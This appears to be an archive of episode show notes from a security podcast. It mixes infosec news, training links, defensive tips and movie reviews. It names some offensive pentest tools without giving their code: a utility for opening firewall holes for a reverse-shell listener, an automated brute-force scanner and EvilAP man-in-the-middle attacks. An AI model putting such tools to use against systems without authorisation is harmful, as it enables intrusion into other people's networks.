- BHIS had a Webinar on New and Imroved Ransomware on 3/1. I haven't seen the link for the slides/recording, but here are a few key points:Be careful of ransomware/hack FUD. Some of the latest vehicle hacks let attackers turn on heat or AC. News reports this as "Hackers pwn all cars and will drive you into a bridge abutment - OMG OMG! P.S. - here's a great resource on bridge abutments .
- Be careful of ransomware/hack FUD. Some of the latest vehicle hacks let attackers turn on heat or AC. News reports this as "Hackers pwn all cars and will drive you into a bridge abutment - OMG OMG! P.S. - here's a great resource on bridge abutments .
- Naughty macros are not a new attack! But they work!
- Again, Internet and application whitelisting are a great idea!
- Bad guys are offering fixes for ransomware by providing links to...more ransomware! You could get double-encrypted - fun, fun, fun!
- Ransomware loves to: set persistence, nuke Volume Shadow Copies, encrypt files, find+mount+encrypt network shares.
- Run tools like Veil-Pillage and PowerView to see what your attackers can see.
- The FBI (specifically an agent at a recent conference) basically said, "Got ransomware? Pay the ransom." There are some tools that might help - try these first: Kaspersky Ransomware Detector, TeslaCrack, Recuva. Or, create an image of the encrypted data, then wait (maybe a few months). By that time, keys/cracks may have been developed for the ransomware that bit your HD.
- How to stop this crap? Internet whitelisting, services like OpenDNS, stop sharing C drive, Adblock plugins, backups that aren't directly available (mapped network drives, \paths, etc.), URL filtering through Web proxy...oh, and SHUT OFF MACROS!
- Hyperion Gray, maker of Punkspider , has a nice CTF online as part of their Concise Courses course ($50). I've taken it in the past and it was great!
- Freecodecamp.com is an absolutely amazing coding resource for the swell price of free. I'm going to tackle it slowly, from start to finish - currently neck-deep in CSS and forms right now!
- Tim Tomes is teaching PWAPT again in April in Charleston . If you can make it I highly recommend going.
- Apple had a victory in its fight with the FBI, and issued a response to the ruling. Here's a nice quote from the judge:
- The DROWN attack is bad news . Disable SSLv2 if at all possible.
- Avecto has released their 2015 report on Microsoft vulnerabilities . You have to give them your email address to get the report, but read the next section on a nice "don't give away your email address" trick.
- 85% of critical Microsoft vulns would be mitigated if user did not have admin rights
- 99.5% of IE vulns would be mitigated if user did not have admin rights
- 63% of ALL Microsoft vulns could be mitigated if user did not have admin rights
- ASUS will get 20 years of auditing due to sucky security practices in their routers. Long and short of it is almost all their security measures in their routers are easily dodged.
- PwnieExpress offers an Internet of Evil Things Report . The top 2016 IoT dangers include:
- Unauthorized, accidental and otherwise misconfigured access points
- BYOD and the personalization of corporate hardware
- Insecure, misconfigured and vulnerable IoT devices
- Sharklasers.com gives you disposable email addresses that legitimately catch email...and then dispose of it after an hour.
- Holepuncher is a slick tool for punching holes in iptables in order to setup a listener for a revshell. Only thing to watch out for is it doesn't seem to clean up after itself when the listening task is done.
- Lengthen.me takes any short URL and lengthens it. Try it now on http://bit.ly/7minsec !
- If you get a lighter jail sentence, be thankful! Don't act like a jackass or your jackass self is likely to get thrown right back in the slammer.
- Kanye West wants to destroy the Pirate Bay...that is, unless he needs to use it .
- Windows 10 now shows ads on your lockscreen (uh, of course that was going to happen eventually) so feel free to turn them off .
View this episode's show notes for more information
Published: Wednesday, March 02, 2016
This episode is a mini review of DEADPOOL! I had a huge reservation about Deadpool before seeing it, but the film squashed it...and has restored my faith in the superhero franchises! I give it an A!
View this episode's show notes for more information
Published: Monday, February 29, 2016
DIY Wifi Network GraphBack in episode 157 I mentioned talked about a great article that walks you through using Kali to create a map of the wifi networks around...
- /var/www/html/sd/basic/config.inc
- /var/www/html/sd/scavenger/partners.php
View this episode's show notes for more information
Published: Friday, February 26, 2016
TrainingGeneral NewsTools/ScriptsMisc/Humor.
- BHIS has a Webinar on New and Improved Ransomware coming up Tuesday March 1st at 2:00PM ET.
- Graceful Security is a great site for introductions to all sorts of great security and pentest topics like Metasploit, Burp, SQLi.
- Wanna learn how to hack cars? Good, because now there's a book for that !
- If you downloaded Linux Mint on Feb. 20th, hopefully you know this already by now, but your download may have been backdoored. Read ZDNet's interview with the hacker behind the hack. It's really interesting stuff. The hacker compromised the site, uploaded modified versions of Mint which contained Tsunami malware, and then changed the checksums on the download page, because "Who the f**k checks those anyway?" Good point. Those checksums should probably be hosted on an independent 3rd party site!
- Locky can lock up all your files with a simple Word Macro. Ouch.
- www.grc.com is back online (at the time of this writing, anyway). In episode #548 , and talks about what he learned about DDOS-mitigation services and why he's not interested in pursuing them at this time.
- Do you use a wireless mouse? It might be subject to a MouseJack attack . Read more about the attack and see if you are using an affected device .
- Oldergeeks.com has a Windows 10 tool that gives easy access to tweaking all the privacy settings Microsoft has buried behind a jillion menus and submenus and reg tweaks.
- The EFF has a neat tool that rates different messaging services and the various levels of security they do (or don't) provide, such as:Encryption in transitIs the code subject to independent review?Encrypted so provider can't read it?
- Encryption in transit
- Is the code subject to independent review?
- Encrypted so provider can't read it?
- Sn1per is a neat automated recon/pentesting tool. I've been testing it out on my RPi and like how you can just point it at a target and it will do an "all in one" scan/attack scheme including:Basic recon like DNS, ping, whoisNmap scanNiktoBrute-force of services/passwords
- Basic recon like DNS, ping, whois
- Nmap scan
- Nikto
- Brute-force of services/passwords
- 7MS.us has had some facelift updates! BPATTY is the documentation project I talked about back in #141. It's my quick and easy "Control F and search for something" document that will be a living/breathing account of my pentest experience as I learn about new scripts, links, resources, etc.The podcast page has been updated to include a mini episode guide highlighting some of our most popular episodes, such as the CEH/OSCP/OSWP training series and career discussions.Thanks for your support. I supported Jay Mohr by clicking his banner and bought a Mad Mag subscription to help send his kid to college.
- BPATTY is the documentation project I talked about back in #141. It's my quick and easy "Control F and search for something" document that will be a living/breathing account of my pentest experience as I learn about new scripts, links, resources, etc.
- The podcast page has been updated to include a mini episode guide highlighting some of our most popular episodes, such as the CEH/OSCP/OSWP training series and career discussions.
- Thanks for your support. I supported Jay Mohr by clicking his banner and bought a Mad Mag subscription to help send his kid to college.
View this episode's show notes for more information
Published: Wednesday, February 24, 2016
People have been writing in asking if they should work in a huge company or a small consulting/IT shop. I think they both have their pros and cons, but in this episode I attempt to oversimplify the decision with this question: How many hats do you want to wear?Also worth checking out is my mini-...
View this episode's show notes for more information
Published: Monday, February 22, 2016
How do you keep 20 Kali boxes setup with Metasploit Pro and updated without any access to the Internet? Carefully, I guess :-). In today's episode I talk about some of those challenges, as well as progress made thus far.Here are some of the commands I mention in the podcast to get the Kali...
- Edit /etc/motd to say what you need to say.
- I setup a batch file with the following command whenever I want to X11-forward stuff from the Putty session to my Win7 machine:
View this episode's show notes for more information
Published: Friday, February 19, 2016
Training OpsGeneral NewsTools/ScriptsMisc/Humor.
- See the replay of the Black Hills Infosec How to Stop Compliance Zombies presentation, and check out the accompanying files as well.
- Tim Tomes is teaching PWAPT - Practical Webapp Pentesting in SC and Boston soon. Keep an eye on his training page or Twitter account . I attended PWAPT (listen to episodes #107 and #108) and it was worth every penny.
- Apple is fighting the FBI's request for backdooring a phone associated with the mass shooting in San Bernardino. Troy Hunt's article gives you a thorough breakdown, and you should also check out a technical explanation of how Apple can comply with the order , and Apple's letter to customers .
- Apple fixes the pesky error 53 that disabled some iPhones recently. The peasants rejoice!
- You definitely should not set your iDevice to January 1, 1970 unless you want to have a very expensive rock for a phone.
- The Glibc flaw affects thousands of devices and this article walks through some of the "what ifs" and practicality of real world exploitation.
- Steve Gibson's GRC.com site has been down for days after being subject to a massive distributed DNS reflection attack.
- You probably shouldn't use Comodo Internet Security. A few weeks ago we talked about how it disables same-origin policy, and apparently it also installs VNC by default.
- Use airgraph-ng to create a wifi network graph . It's cool!
- Pee Wee Herman is returning to TV (specifically Netflix) in March. I hope he brings a huge foil or rubber band ball!
View this episode's show notes for more information
Published: Wednesday, February 17, 2016
I never thought working from home would make it harder to transition to "home time" when the clock strikes 5 p.m. Today's episode discusses 3 ways I'm trying to be a more connected parent:.
- Screens off!
- Carve out 1-on-1 time with each kid
- Bend the rules once in a while
View this episode's show notes for more information
Published: Tuesday, February 16, 2016
Things discussed today:.
- We could make $1M if we made a tool that could correlate data from all the popular pentesting tools.
- The differences in vuln descriptions between AppSpider and Nexpose really grind my gears!
- My parents' dog wears a $50 LL Bean jacket - wha?
- If you have a URL list with lots of junk characters before/after the address (like I do when I copy/paste from AppSpider) here's how you can clean that up in Notepad++ :Copy/paste the list of URLs into Notepad++.Do a Ctrl+F, click Replace, and search for Regular Expression of Root Cause.*** and then Replace All with nothing.
- Copy/paste the list of URLs into Notepad++.
- Do a Ctrl+F, click Replace, and search for Regular Expression of Root Cause.*** and then Replace All with nothing.
- Click Replace All and everything at the end of the URLs will be nuked.
- Do the Replace All again, but this time with URL:. as the regular expression.
- Then everything before the URL will be nuked and you'll have a nice clean list of URLs to work with!
View this episode's show notes for more information
Published: Friday, February 12, 2016
General newsTools/scriptsMisc/Humor.
- Patch all your Microsoft stuff - Krebs does a great job (as always) of giving you the skinny on what the patches fix, as does Qualys .
- It might be too late, but Google was offering 2 extra gigs of Google Drive storage by taking their security tune-up survey.
- VTech is back online and totally not responsible for your data . Keep an eye on their Facebook page because they are clearly still having issues.
- Thousands of FBI/DHS records were leaked but DHS has not yet confirmed/commented.
- Trinket.io lets you write and run code in the browser - great, I don't need to run a Raspberry Pi just for coding anymore!
- Maybe lets you see the effect a Linux command could have on your system before actually running it.
- SecurityHeaders.io lets you quickly see the headers (like CSP/HSTS) enabled on a Web site. I tested 7ms.us and got a big fat fail. I will work on this!
- Zoolander set a world record for longest selfie stick .
View this episode's show notes for more information
Published: Wednesday, February 10, 2016
Today's episode is a movie review of Ex Machina (how the FRICK do you pronounce that?) and closes out with special musical guest, Sweet Surrender!
View this episode's show notes for more information
Published: Monday, February 08, 2016
This is a mini-review of the Almond 2015 router by Securifi. This is NOT a paid advertisement or endorsement. I just happen to REALLY like this little router.
View this episode's show notes for more information
Published: Friday, February 05, 2016
Here are some of my favorite stories and links for this week!Training opportunitiesNewsTools.
- NMAP course from Udemy - $24 for a limited time (I think)
- How to handle the the thoughtless compliance zombie hordes - by BHIS is coming up Tuesday February 16th from 2-3 ET. The price is free!
- Pivot Project touts itself as "a portfolio of interesting, practical, enlightening, and often challenging hands-on exercises for people who are trying to improve their mastery of important cybersecurity skills.
- It is absurdly easy for attackers to destroy your Web site in 10 minutes .
- Secure your home network better using advice from the SANS Ouch! newsletter .
- Chromodo (part of Comodo's Internet Security) disables same-origin policy which basically disables Web security. Wha?!
- Virus total now looks at firmware images as well.
- We can soon wave goodbye to Java in the browser forever! . Kinda.
- Here's a nice SSL/TLS-checking checklist for pentesters .
- Kali is moving to a rolling release configuration pretty soon. Update yours before April 15!
View this episode's show notes for more information
Published: Wednesday, February 03, 2016
In today's off-topic episode I review the following movies:.
View this episode's show notes for more information
Published: Monday, February 01, 2016
This episode continues the series on securing your life - making sure all the security stuff related to your life is in order. Today we're particularly focusing on preparing to travel. What if (God forbid) the plane goes down? Who has access to your money, passwords, etc.?
View this episode's show notes for more information
Published: Thursday, January 28, 2016
Yep, there are tons of people/blogs/magazines/children/pets who have provided reviews of the Apple Watch. This is mine.
View this episode's show notes for more information
Published: Tuesday, January 26, 2016
In this episode I talk about how to build a cheap hosted Mutillidae server to safely hack away on while keeping other Internet prowlers out. Here are the basic commands to run to lock down the Digital Ocean droplet's iptables firewall:Flush existing rulessudo iptables -FAllow all concurrent...
View this episode's show notes for more information
Published: Saturday, January 23, 2016
Here are some of my favorite stories and links for this week!.
- If you missed last week's BURN IT ALL! Webcast, it's now online as a Youtube video .
- There is still time to register for the Real World Web Penetration Testing Webinar. It's (Thursday, January 28 @ 1 p.m. CST) and $25 (cheap!)
- Trustwave is in big trouble after failing to find hackers under their noses . Their noses must really hurt because Mandiant was quick to point out the work done by Trustwave was "woefully inadequate."
- I'm scared of IoT stuff. Why? Oh, I don't know, because what happens when your Nest fails and leaves your buttcheeks freezing cold ?!?!?Or what if hackers steal your doorbell, and thus your wifi password and pwn your network ?Thankfully, OWASP now now has a top 10 for IoT stuff too.
- Or what if hackers steal your doorbell, and thus your wifi password and pwn your network ?
- Thankfully, OWASP now now has a top 10 for IoT stuff too.
- A researcher found some clever ways to abuse Lastpass with an exploit called Lostpass . Lastpass responded with a security change wherein a Lastpass authentication from a new device requires approval via email.
- A new Sysinternals tool helps figure out if you have shady, unsigned files in c:\windows\system32.
- Oh, and for sure upgrade all your iThings ASAP. Apple patched some ugly security holes.
View this episode's show notes for more information
Published: Thursday, January 21, 2016
In today's off-topic episode I review two movies: Sicario and The Walk.
View this episode's show notes for more information
Published: Thursday, January 21, 2016
I recently had the opportunity to shoulder-surf with some seasoned Webapp pentesters, and wanted to share what I learned about their tools, techniques and methodologies.
View this episode's show notes for more information
Published: Friday, January 15, 2016
Here are some of my fav' stories and links for this week!.
- Burn it all...The New Security Fundamentals (Wednesday, January 20 @ 1 p.m. CST): a free Webinar on setting up the "core technical things you need to do for your security program." I've attended many Webinars from the BHIS group and they're always informative and humorous.
- Real World Web Penetration Testing (Thursday, January 28 @ 1 p.m. CST): a $25 Webinar on going through "a real world penetration test. We will explore the methodology and procedures Secure Ideas follows as we test web applications. The course will also walk through some tricks and tips on how to focus your testing on likely flaws."I have seen four of their recorded courses before and found them to be absolutely worth the money I spent, so I'm confident this upcoming session will be no exception.
- Fortinet SSH backdoor not much to say except if you use any of the affected products, update immediately as they contain an SSH backdoor:FortiOS v4.3.17 or any later version of FortiOS v4.3 (available as of July 9, 2014)FortiOS v5.0.8 or any later version of FortiOS v5.0 (available as of July 28, 2014)Any version of FortiOS v5.2 or v5.4
- FortiOS v4.3.17 or any later version of FortiOS v4.3 (available as of July 9, 2014)
- FortiOS v5.0.8 or any later version of FortiOS v5.0 (available as of July 28, 2014)
- Any version of FortiOS v5.2 or v5.4
- Hacker sentenced to 334 years in prison for operating a phishing Web site similar to that of a legit banking Web site. Moral of the story? Don't do that.
- Don't use IE 8, 9 or 10 anymore! unless you like to live dangerously.
View this episode's show notes for more information
Published: Thursday, January 14, 2016
This off-topic episode covers:.
- Media servers - I'm a newb in this area and could use your help in setting up a config that actually works!
- Making a Murderer - this is a fantastic documentary on Netflix. Stop what you're doing (once you listen to this episode) and watch immediately please.
View this episode's show notes for more information
Published: Monday, January 11, 2016
Happy (belated) new year! This episode is more of a "What am I listening to, a PBS telethon?!" kind of thing, and I'm sorry for that. But I want to cover:.
- Scheduling changes for 2016 - we're gonna be 3 times a week!
- A new documentation project I'm working on called BPATTY (Brian's Pentesting and Technical Tips for You)
- A way you can support the podcast financially.
View this episode's show notes for more information
Published: Friday, January 08, 2016
This episode talks about some cool video games I've been playing lately:I recommend 'em all!.
- Metal Gear Solid Phantom Pain (Xbox 360)
- Rise of the Tomb Raider (Xbox 360)
- Luminocity (iPhone)
- Super Mario Maker (Wii U)
View this episode's show notes for more information
Published: Friday, January 08, 2016
Back in episode #93 I talked about securing your life - in other words, asking yourself "What would happen if I was dead right now? Do I have adequate insurance? Are my finances in order? How about estate planning?"This episode continues that train of thought, and I share some new changes I've...
View this episode's show notes for more information
Published: Thursday, January 07, 2016
Looks like I'm one of the few people in the world who did NOT love this movie. I found it painful slow and claustrophobic. #diappointed.
View this episode's show notes for more information
Published: Wednesday, January 06, 2016
This off-topic episode talks about one of the most gripping and disturbing documentaries I've ever seen. Welcome to Leith, in a nutshell, asks the question: What would you do if a white supremacist group moved in next door?
View this episode's show notes for more information
Published: Tuesday, January 05, 2016
One skill that's been kind of a hinderance in my IT/security career is I have exactly zero experience in programming/coding. Zero. Zip. Nil. Nada. Nothing..But I'm trying to remedy that in 2016 by learnin' me some Python, and I picked up a great book called [Python Crash...
View this episode's show notes for more information
Published: Monday, January 04, 2016
This is a four-part series about my transition to a new job! The topics are as follows:.
- Part 1: When it may be time to look for a new job (or not)
- Part 2: How to stand out during phone screenings and interviews
- Part 3: How to gracefully transition from old job to new job
- Part 4: Here's what I'm doing in my new gig!
View this episode's show notes for more information
Published: Friday, January 01, 2016
This is a four-part series about my transition to a new job! The topics are as follows:.
- Part 1: When it may be time to look for a new job (or not)
- Part 2: How to stand out during phone screenings and interviews
- Part 3: How to gracefully transition from old job to new job
- Part 4: Here's what I'm doing in my new gig!
View this episode's show notes for more information
Published: Friday, January 01, 2016
This is a four-part series about my transition to a new job! The topics are as follows:.
- Part 1: When it may be time to look for a new job (or not)
- Part 2: How to stand out during phone screenings and interviews
- Part 3: How to gracefully transition from old job to new job
- Part 4: Here's what I'm doing in my new gig!
View this episode's show notes for more information
Published: Friday, January 01, 2016
This is a four-part series about my transition to a new job! The topics are as follows:.
- Part 1: When it may be time to look for a new job (or not)
- Part 2: How to stand out during phone screenings and interviews
- Part 3: How to gracefully transition from old job to new job
- Part 4: Here's what I'm doing in my new gig!
View this episode's show notes for more information
Published: Wednesday, December 30, 2015
The title says it all. I had two days to pentest a network that probably would've taken two or more people two weeks or more. I laughed. I cried. I had fun.
View this episode's show notes for more information
Published: Tuesday, December 29, 2015
This episode talks about some fun I had using sqlmap, and how using it in conjunction with Sqlninja makes me happy to be alive.
View this episode's show notes for more information
Published: Sunday, December 27, 2015
In this episode I talk about face-planting in my office at the first job I had out of college.
View this episode's show notes for more information
Published: Sunday, December 27, 2015
In this episode, I talk about a restaurant infosec assessment I did, and how the recommendations coming out of that assessment didn't fit the standard "mold." I also talk about how being transparent and helpful - and NOT billing clients for every tiny little thing - is king.
View this episode's show notes for more information
Published: Sunday, December 27, 2015
This episode covers a few HIPAA tidbits I picked up while preparing for - and executing - a HIPAA security assessment.
View this episode's show notes for more information
Published: Thursday, December 24, 2015
This episode isn't about infosec exactly, but it talks about how using public resources like LinkedIn, Twitter and blogs to boost your "brand" (though I hate that word) and help you get more connected to the infosec community, job leads and more!
View this episode's show notes for more information
Published: Wednesday, December 23, 2015
Way back in episode #93, I talked about things you can do to secure your life (mortgage review, adequate insurance, estate planning, investments, etc.).This episode continues that train of thought and covers: getting the right amount of life insurance, getting the right home/auto coverage, as...
View this episode's show notes for more information
Published: Wednesday, December 23, 2015
This episode is 90% a rant about how annoying carry-on luggage and air travel can be, and a 10% sprinkling of security sauce mixed in. Hence: sprinkles.
View this episode's show notes for more information
Published: Tuesday, December 22, 2015
This episode talks about my experience in doing a "redo" security assessment, during which I struggled with the following questions: what's the best way to efficiently correct the erroneous information and make the customer happy without asking ALL the original questions over again? Especially...
View this episode's show notes for more information
Published: Sunday, December 20, 2015
This episode is about a documentary called An Apology to Elephants . It's all about the treatment (or mistreatment) of elephants, and the main message of the movie is, "Please don't go to the circus when it's in town, because you're supporting elephant...
View this episode's show notes for more information
Published: Saturday, December 19, 2015
Part 2 concludes my journey in moving 7ms.us from Tumblr to a Digital Ocean droplet running Ghost. Here are the key resources mentioned during the podcast:You can subscribe to the 7 Minute Security podcast here .
- How to run multiple Ghost blogs on one DI VPS . The key takeaway here was that I had to upgrade to the $10 droplet (I did a "flexible" resize to add more proc/memory) and then the second instance of Ghost installed fine.
- Turning on CloudFlare SSL was easy. I chose flexible SSL since I wasn't using a "real" cert. I also wrote a rule to force HTTPs for all connections. And, just for grins, I turned on DNSSEC. Because...why not? :-)
- I picked a strong root password for my DI droplet, but I still don't like the idea of IPs banging on that connection all day and night. I followed this article on installing Fail2Ban to prevent my SSH login from being abused.There are a few IPs that I want to perma-ban, so I'm going to look through this article and this one which looks a tad easier.
- There are a few IPs that I want to perma-ban, so I'm going to look through this article and this one which looks a tad easier.
View this episode's show notes for more information
Published: Friday, December 18, 2015
Announcing the 7MS PURGE! I've got a back log of episodes banked and I want to get caught up for the new year. So I'm going to release one (or maybe more) episodes per day between now and 2016. Plus (spoiler alerts!) in 2016 we're moving to a Monday/Wednesday/Friday release schedule. Yep, 7MS...
View this episode's show notes for more information
Published: Thursday, December 17, 2015
In this episode I talk about my adventures in moving my brianjohnson.tv Tumblr content over to a Digital Ocean hosted droplet running Ghost.I think you'll want to check this episode out, because in part 2 I talk about the challenges I faced in hosting multiple Ghost instances on one DI droplet. I...
View this episode's show notes for more information
Published: Tuesday, July 15, 2014
In this episode I talk about why I’m pulling my domains from GoDaddy, and making DNSimple their new home.Download: 7MS #20: Moving from GoDaddy to DNSimple (audio)Show notes:.
- The service I’m talking about in this podcast is DNSimple .
- Troy Hunt ’s humorous/awesome article pushed me over the edge and convinced me to give DNSimple a try.
- If you found this article and are going to give DNSimple a shot, you could throw me a bone and use my referral code .
View this episode's show notes for more information
Published: Saturday, July 05, 2014
In this episode I talk about a deliciously vulnerable series of VMs called Kioptrix, and how you can use them to sharpen your pentesting skills.Download: 7MS #19: Kioptrix! (audio)Show notes:.
- The Kioptrix series of VMs is here: http://www.kioptrix.com/blog/test-page/ and here: http://vulnhub.com/?q=kioptrix&sort=date-des&type=vm.
- Got approved for my OSCP training and I start it in a few weeks :-). Much more to come on that - I plan on dedicating at least an episode or two to it.
View this episode's show notes for more information
Published: Sunday, June 22, 2014
In this episode I talk about some wireless security basics that we’re not seeing when out on assessments.Download: 7MS #18: Wireless Security 101 (audio)Show notes:.
- WEP encryption is very, very bad. It’s easy to crack. Don’t use it.
- Wifite will demonstrate how easy it is to crack WEP.
- Stronger encryption such as WPA/WPA2 are recommended, but do not give an excuse for using weak passwords!
- On a personal note, I’m starting the OSCP soon :-). Two great first-hand accounts of the OSCP experience (both well worth your time) are here: http://buffered.io/posts/oscp-and-me/ and http://blog.g0tmi1k.com/2011/07/pentesting-with-backtrack-pwb/
View this episode's show notes for more information
Published: Saturday, June 14, 2014
In this episode I share my experience with EC-Council’s Certified Ethical Hacker training and exam.Download: 7MS #17: How to Pass the Certified Ethical Hacker Exam (audio) Show...
- Here’s info on the CEH training and test outline .
- I took my CEH training through UFairfax with instructor Leo Dregier .
- See this post I wrote that details more of my feedback on the CEH material itself. The material is good in general, it just feels a bit dated.
- Best test-taking tip I can give: read the questions and all answers very carefully. In most cases you should be able to eliminate two answers right off the bat, increasing your chances of getting the question to 50/50 even if you aren’t sure.
View this episode's show notes for more information
Published: Saturday, May 31, 2014
In this episode I talk about my first-hand experience using the PwnPad for wireless pentesting.Download: [7MS #16: PwnPad Initial Impressions - Part...
- In a nutshell: PwnPad is a great tool to simplify/automate some wireless recon and/or hacking!
- PwnieExpress has a great write-up on mapping APs w/GPS coordinates using Google Earth here: https://www.pwnieexpress.com/mapping-wifi-networks-pwn-pad-2014/ .
- They also have a nice write-up on practical use of EvilAP to do man-in-the-middle attacks: https://www.pwnieexpress.com/evilap-practical-example/ .
View this episode's show notes for more information
Published: Saturday, May 24, 2014
In this episode I talk about my initial impressions of using the PwnPad for wireless pentesting.Download: [7MS #15: PwnPad Initial...
- Carrying around a Nexus 7 instead of a bulky laptop to do wireless pentesting sure is nice!
- PwnPad scripts/automates much of the “busy work” to capture WPA handshakes.
View this episode's show notes for more information
Published: Saturday, May 10, 2014
In this episode I talk about two (sort of) security related tips that I’ve learned by using Windows 8 wrong.Download: 7MS #14: H8 4 Win8 (audio) Show notes:.
- Windows Defender doesn’t seem to auto-update on Win 8 unless you have updates set to auto download/install.
- I found a nifty script you can add as a scheduled task but I can’t find the source, so I put it on Dropbox here .
- Captain Obvious security tip: if you use Bitlocker w/USB boot key, don’t carry the key around with you. :-)
View this episode's show notes for more information
Published: Saturday, May 03, 2014
In this episode I talk about how I had to sent my HP laptop in for repair and, to my surprise, it (allegedly) came back with a bonus: malware!Download: 7MS #13: How to Get Pwned by HP (audio) Show notes:My...
- See a pic of my FortiClient picking up on the fun malware.
- Always format your hard drive before having it serviced anywhere.
- When it gets back from service, format it AGAIN before doing anything.
View this episode's show notes for more information
Published: Wednesday, April 30, 2014
In this episode I talk about an account takeover article that freaked me out, and why it changed a few things about how I handle my important online accounts.Download: [7MS #12: Why My Domains Have Gan to Gandi...
- This episode is all about this article ( https://medium.com/cyber-security/24eb09e026dd ) in which a Twitter user is extorted into giving up his sought-after Twitter handle.
- Lessons learned for me: first, ensure your primary “reset” email is well-protected, such as a Gmail account with 2FA. Second, put long TTLs on your MX records. Third, consider a domain with a bit beefier of security controls, such as Gandi .
View this episode's show notes for more information
Published: Saturday, April 12, 2014
In this episode I totally throw my subscribers for a loop and do a VIDEO podcast about overtraining your Touch ID on your iPhone.Download: 7MS #11: Overtraining your iPhone Touch ID (video) Show...
- I first read about this from Steve Gibson of GRC at https://www.grc.com/sn/sn-440.htm . But I was listening to the audio-only version of the podcast, and the steps didn’t make sense to me until I did it in person. Thought it might help some folks by making a video version of these steps!
View this episode's show notes for more information
Published: Saturday, April 05, 2014
In this episode I talk more about some infosec-y things I’m doing on the home front to nurture a security culture (if you will) with my wife and kids.Download: [Episode 10: Information Security for the Whole Family – part 2...
- If you have kids and are considering a tablet for them, I’d highly recommend a Kindle Fire with FreeTime (full disclosure: I’m not associated with Amazon and they’re not giving me anything to say flattering things about their devices/services…though I wish they would).
- When my son gets a bit older and a tad more “interested” in what’s out on the Internet, I’ll probably use OpenDNS to police Web traffic.
View this episode's show notes for more information
Published: Saturday, March 29, 2014
In this episode I talk about how being an infosec guy has ruined my family’s life (well, not really)Download: Episode 9: Information Security for the Whole Family (audio) Show notes:.
- To keep peace in your household, I’d recommend making sweeping network changes when your family members aren’t around (i.e. changing the wifi password).
- If you have to manage passwords with your spouse or significant other, I highly recommend a password management tool like LastPass (with 2-factor authentication).
View this episode's show notes for more information
Published: Saturday, March 22, 2014
Download: Episode 8: CISSP – Is That the Cert for Me? (audio) Show notes:.
- I used this book as my primary study tool. It comes with a whole slew of companion materials like a pre-assessment test, flashcards and 3 full practice exams.
- I also found this LogicalSecurity site had helpful practice exams, and so did this Syngress site .
- The CISSP exam costs $600. You get 6 hours to finish 250 questions that are all multiple choice. I took the full 6 hours by going through the test once, taking a stretch break, going through the questions again, took another test break, then went through the questions a third time and called it a day. Some questions may not count for/against you, but you they aren’t marked as such, so you gotta give your best effort to every question!
- FAQ: “Is it hard? I’m in an unrelated field and now I want to be a CISSP – can I make the change?” I think that
- Don’t forget, when you pass the test your CISSP is not yet “official” – someone must attest to your skills/experience and you need to start taking CPEs to maintain your credentials!
View this episode's show notes for more information
Published: Saturday, March 15, 2014
Episode lucky #7!!!In this episode I talk about external network vulnerabilities that we see in many of our assessments – some of which are pretty easy to clear up.Download: [Episode 7: External Vulnerabilities that Byte...
- RC4 – a risk that we find just about anywhere SSL is used, but in most cases it’s pretty easy to take “off the menu.”
- Self-signed certs are bad, especially for anything where a login is used. Public SSL certs have come down in cost – especially wildcart certs – so use ‘em!
- DNSSEC – I’ve yet to come across a domain I’ve audited that has DNSSEC enabled (Google doesn’t see many DNS requests that are DNSSEC-enabled ), but now’s the time to read up on it . I think it will become a hotter topic this year and next.
- SPF records are easy to make , so use ‘em!
View this episode's show notes for more information
Published: Saturday, March 08, 2014
In this episode I continue talking about some basic firewall rules that many organizations don’t have in place.Download: Episode 6: Fun Firewall Rules – part 2 (audio) Show notes:.
- Limit outbound DNS requests to just the ISP servers (or whatever external servers you use).
- Anytime a firewall rule is changed, perform a vulnerability scan and/or port scan to validate changes. Sometimes the “any/any” rules can cause some serious damage.
View this episode's show notes for more information
Published: Saturday, March 01, 2014
In this episode I talk about some basic firewall rules that many organizations don’t have in place.Download: Episode 5: Fun Firewall Rules – part 1 (audio) Show notes:.
- Block outbound port TCP 25 for all devices except your mail server(s).
- If you use a third party mail filter like Postini or Securence, ensure that only their IPs are allowed to send mail directly to your environment.
- Check your mail server config as far as what devices are allowed to relay anonymously to the outside world.
- Take advantage of outbound smarthosting to filter outgoing spam.
View this episode's show notes for more information
Published: Saturday, February 22, 2014
In this episode I continue talking about some dos and donts of patch strategies – this time talking about enterprise level gear.Download: Episode 4: Patch Strategies: Part Deux (audio) Show notes:.
- There are often two trains of thought in regards to enterprise gear patching (like routers, switches, firewalls). 1. If it ain’t broke, don’t fix it. 2. If I see a new firmware release at noon today, I’m gonna install it at 12:05 p.m.
- Both trains of thought have problems. If you let your firmware get too long in the teeth, you may be susceptible to old vulns and your gear may crash if hit with something as simple as a vulnerability scan. If you patch too aggressively, you may end up patching unnecessarily (new firmware may just have GUI fixes, for example, that you don’t even use). You need to review the firmware release notes to see if it fixes security related issues and/or applies to your environment.
View this episode's show notes for more information
Published: Thursday, February 13, 2014
In this episode I talk about some trends (and problems) we’re seeing on the patching front – specifically OS and third-party apps.Download: Episode 3: Patch Strategies: Part 1 (audio) Show notes:.
- Most organizations have the Microsoft side of the house patched well – but the third party apps (Java/Flash/Reader/etc.)? Not so much…but that’s just as important as OS patching!
- Most orgs do not have a good game plan for reviewing, testing, approving and pushing patches – they just patch “When we can.”
- If you’re running Tool X to get a feel for how well the environment is patched, also run a scan periodically with Tool Y to see if things are really as patched as they appear.
- DON’T put your end-users in charge of patching their own machines, no matter how savvy they are.
- Authenticated scans are good! Do both authenticated and unauthenticated for the best results.
View this episode's show notes for more information
Published: Monday, February 03, 2014
In this episode I talk about how a client of ours learned a hard lesson: that the lack of logging/alerting makes for a pretty miserable investigation after they were breached.Download: [Episode 2: The Importance of Logging and Alerting!...
- Public-facing terminal servers without 2FA basically have a sign on their back that say “Kick me. Then hack me.”
- At first sign of breach, unplugging the firewall is a good idea but make sure you’ve got a log server setup so you don’t lose the firewall’s local cache of logs!
- The terminal servers mentioned in this episode had extra suspicious local admin accounts called Template and root.
- Make sure that you’re auditing for account management in your Active Directory environment! (see Local Computer Policy->Computer Configuration->Windows settings->Security Settings->Local Policies->Audit Policy->Audit account management)
- The bad guys had downloaded a fun kit of tools to the terminal servers, including ophcrack_nogui, serverpw and plink.exe.
- Besides ensuring the technical infrastructure has great logging/alerting, make absolute sure that if you run an EHR system, they have detailed logs as to who logged in, when, and what they did while logged in. In this episode, the EHR in question held absolutely no logs. That’s right: none!
View this episode's show notes for more information
Published: Tuesday, January 14, 2014
In this episode, I talk about the inspiration behind the 7MS podcast and my vision for it going forward. (Admittedly, my ulterior motive is to use this intro episode to figure out how in the heck to get this podcast submitted and visible on iTunes :-). Download [Episode 1: Epic Introduction to...
View this episode's show notes for more information